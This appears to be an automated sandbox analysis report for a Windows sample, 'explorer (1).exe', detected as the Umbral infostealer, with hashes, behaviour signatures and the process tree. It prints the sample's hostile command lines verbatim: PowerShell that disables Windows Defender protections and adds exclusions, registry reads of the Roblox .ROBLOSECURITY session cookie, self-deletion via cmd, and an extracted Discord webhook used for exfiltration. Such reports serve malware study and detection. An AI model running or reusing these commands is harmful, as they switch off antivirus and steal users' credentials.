Analysis
-
max time kernel
94s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
16-09-2024 18:21
Static task
static1
Behavioral task
behavioral1
Sample
explorer (1).exe
Resource
win7-20240903-en
General
-
Target
explorer (1).exe
-
Size
1.3MB
-
MD5
575b9fa5e916d6e0fe48003127c0e7b3
-
SHA1
ea732f7fcd8e0f20f8c66c8a0ab20880851c2f6e
-
SHA256
e45dc08a9c9c96afdcbb33dc108417df2ec52ccb0bb1f776bc83770c70ef4739
-
SHA512
3f337262446aad13ad05589f170149b916692ef4dffd1f005029dcbd01a6e703442d19678641501d466df9f3e264ed946ee39290141fc470ba545725d8fd3f14
-
SSDEEP
24576:StvMlasKkTqxNx5V27DeEhP959IY9noqx78BXO/1byJRT:0gep23b9IUoqxT/1byJ
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom
Signatures
-
Detect Umbral payload 4 IoCs
resource yara_rule behavioral2/memory/904-2-0x00000000003D0000-0x000000000086E000-memory.dmp family_umbral behavioral2/memory/904-51-0x00000000003D0000-0x000000000086E000-memory.dmp family_umbral behavioral2/memory/904-131-0x00000000003D0000-0x000000000086E000-memory.dmp family_umbral behavioral2/memory/904-135-0x00000000003D0000-0x000000000086E000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1840 powershell.exe 3108 powershell.exe 3588 powershell.exe 4572 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts explorer (1).exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 904 explorer (1).exe 904 explorer (1).exe 904 explorer (1).exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer (1).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2832 PING.EXE 3408 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2164 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2832 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 904 explorer (1).exe 1840 powershell.exe 1840 powershell.exe 3108 powershell.exe 3108 powershell.exe 3588 powershell.exe 3588 powershell.exe 4412 powershell.exe 4412 powershell.exe 4572 powershell.exe 4572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 904 explorer (1).exe Token: SeIncreaseQuotaPrivilege 3984 wmic.exe Token: SeSecurityPrivilege 3984 wmic.exe Token: SeTakeOwnershipPrivilege 3984 wmic.exe Token: SeLoadDriverPrivilege 3984 wmic.exe Token: SeSystemProfilePrivilege 3984 wmic.exe Token: SeSystemtimePrivilege 3984 wmic.exe Token: SeProfSingleProcessPrivilege 3984 wmic.exe Token: SeIncBasePriorityPrivilege 3984 wmic.exe Token: SeCreatePagefilePrivilege 3984 wmic.exe Token: SeBackupPrivilege 3984 wmic.exe Token: SeRestorePrivilege 3984 wmic.exe Token: SeShutdownPrivilege 3984 wmic.exe Token: SeDebugPrivilege 3984 wmic.exe Token: SeSystemEnvironmentPrivilege 3984 wmic.exe Token: SeRemoteShutdownPrivilege 3984 wmic.exe Token: SeUndockPrivilege 3984 wmic.exe Token: SeManageVolumePrivilege 3984 wmic.exe Token: 33 3984 wmic.exe Token: 34 3984 wmic.exe Token: 35 3984 wmic.exe Token: 36 3984 wmic.exe Token: SeIncreaseQuotaPrivilege 3984 wmic.exe Token: SeSecurityPrivilege 3984 wmic.exe Token: SeTakeOwnershipPrivilege 3984 wmic.exe Token: SeLoadDriverPrivilege 3984 wmic.exe Token: SeSystemProfilePrivilege 3984 wmic.exe Token: SeSystemtimePrivilege 3984 wmic.exe Token: SeProfSingleProcessPrivilege 3984 wmic.exe Token: SeIncBasePriorityPrivilege 3984 wmic.exe Token: SeCreatePagefilePrivilege 3984 wmic.exe Token: SeBackupPrivilege 3984 wmic.exe Token: SeRestorePrivilege 3984 wmic.exe Token: SeShutdownPrivilege 3984 wmic.exe Token: SeDebugPrivilege 3984 wmic.exe Token: SeSystemEnvironmentPrivilege 3984 wmic.exe Token: SeRemoteShutdownPrivilege 3984 wmic.exe Token: SeUndockPrivilege 3984 wmic.exe Token: SeManageVolumePrivilege 3984 wmic.exe Token: 33 3984 wmic.exe Token: 34 3984 wmic.exe Token: 35 3984 wmic.exe Token: 36 3984 wmic.exe Token: SeDebugPrivilege 1840 powershell.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeIncreaseQuotaPrivilege 1256 wmic.exe Token: SeSecurityPrivilege 1256 wmic.exe Token: SeTakeOwnershipPrivilege 1256 wmic.exe Token: SeLoadDriverPrivilege 1256 wmic.exe Token: SeSystemProfilePrivilege 1256 wmic.exe Token: SeSystemtimePrivilege 1256 wmic.exe Token: SeProfSingleProcessPrivilege 1256 wmic.exe Token: SeIncBasePriorityPrivilege 1256 wmic.exe Token: SeCreatePagefilePrivilege 1256 wmic.exe Token: SeBackupPrivilege 1256 wmic.exe Token: SeRestorePrivilege 1256 wmic.exe Token: SeShutdownPrivilege 1256 wmic.exe Token: SeDebugPrivilege 1256 wmic.exe Token: SeSystemEnvironmentPrivilege 1256 wmic.exe Token: SeRemoteShutdownPrivilege 1256 wmic.exe Token: SeUndockPrivilege 1256 wmic.exe Token: SeManageVolumePrivilege 1256 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 904 explorer (1).exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 904 wrote to memory of 3984 904 explorer (1).exe 83 PID 904 wrote to memory of 3984 904 explorer (1).exe 83 PID 904 wrote to memory of 3984 904 explorer (1).exe 83 PID 904 wrote to memory of 1136 904 explorer (1).exe 86 PID 904 wrote to memory of 1136 904 explorer (1).exe 86 PID 904 wrote to memory of 1136 904 explorer (1).exe 86 PID 904 wrote to memory of 1840 904 explorer (1).exe 88 PID 904 wrote to memory of 1840 904 explorer (1).exe 88 PID 904 wrote to memory of 1840 904 explorer (1).exe 88 PID 904 wrote to memory of 3108 904 explorer (1).exe 93 PID 904 wrote to memory of 3108 904 explorer (1).exe 93 PID 904 wrote to memory of 3108 904 explorer (1).exe 93 PID 904 wrote to memory of 3588 904 explorer (1).exe 95 PID 904 wrote to memory of 3588 904 explorer (1).exe 95 PID 904 wrote to memory of 3588 904 explorer (1).exe 95 PID 904 wrote to memory of 4412 904 explorer (1).exe 97 PID 904 wrote to memory of 4412 904 explorer (1).exe 97 PID 904 wrote to memory of 4412 904 explorer (1).exe 97 PID 904 wrote to memory of 1256 904 explorer (1).exe 100 PID 904 wrote to memory of 1256 904 explorer (1).exe 100 PID 904 wrote to memory of 1256 904 explorer (1).exe 100 PID 904 wrote to memory of 4844 904 explorer (1).exe 102 PID 904 wrote to memory of 4844 904 explorer (1).exe 102 PID 904 wrote to memory of 4844 904 explorer (1).exe 102 PID 904 wrote to memory of 3752 904 explorer (1).exe 104 PID 904 wrote to memory of 3752 904 explorer (1).exe 104 PID 904 wrote to memory of 3752 904 explorer (1).exe 104 PID 904 wrote to memory of 4572 904 explorer (1).exe 106 PID 904 wrote to memory of 4572 904 explorer (1).exe 106 PID 904 wrote to memory of 4572 904 explorer (1).exe 106 PID 904 wrote to memory of 2164 904 explorer (1).exe 108 PID 904 wrote to memory of 2164 904 explorer (1).exe 108 PID 904 wrote to memory of 2164 904 explorer (1).exe 108 PID 904 wrote to memory of 3408 904 explorer (1).exe 112 PID 904 wrote to memory of 3408 904 explorer (1).exe 112 PID 904 wrote to memory of 3408 904 explorer (1).exe 112 PID 3408 wrote to memory of 2832 3408 cmd.exe 114 PID 3408 wrote to memory of 2832 3408 cmd.exe 114 PID 3408 wrote to memory of 2832 3408 cmd.exe 114 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1136 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"1⤵
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer (1).exe'2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- System Location Discovery: System Language Discovery
PID:4844
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
PID:3752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:2164
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe" && pause2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2832
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD578085515614fa352c2e30ff050cd06a3
SHA1bc057d8adf14372e2d62ef70fa62482783e408da
SHA256f66b96adb56be3a00663094179de324f8b02cf1ff0cd732c954cbdb9c1d3195d
SHA5125a012ad492a3119f5413302d13e165c516df1d6e8af9c606d194378ebee759d6e0866d730f36795672fed24c5ccdd9135bc5b64671ed03c2d4e88b3c6e0cb56d
-
Filesize
17KB
MD55e75ee31b7e34ba3669f9af64dab0358
SHA141ff4a90bacdc1003476152145febd40654e36d2
SHA256ed15715eb8455efc2a223c2eebd883384933ddfba48751d513a9d9dcb5402509
SHA512a5db964b7c78c504f16d39791ff3c7e45be78fab8c912e5fe13c8a6f6ae147288a8d49346265d33fd164667852af3cc72c2124b4dcfd6e313d8a80b8ebf34fe8
-
Filesize
18KB
MD5c4fd743ec3f49eae45150d7c7736f446
SHA16a28da1291d4477c07d5727a43b688509e2d0dba
SHA256ac4753cb1c79be0ff7b38a9e0603545c7bd0bac2a0ad8c354ccae24784c42aca
SHA51211968c19761ad05a6e53c7c825323e65b011cab5b6f2c9ff05c74c4acabc263847a2f7f128404b736e7af6301302253c6b12863040eaad97e228effe1701c552
-
Filesize
14KB
MD54ebde9c03347e319b051bd1b6f2b4142
SHA1f7cd5ab154e90662affba628412cdc840c15813a
SHA2566a824610ec3281d64ea8a72afe8634cfa430e63d175ffbc910adfc21bb0ab613
SHA5125ee84e6b96302a668da8b2aed8d66389cec39863dc72f4c25b3e800f1273d325ae39b3cb4458acfb387dcb3971adbd47716faec83d628a0edf8fde33ba8547ac
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82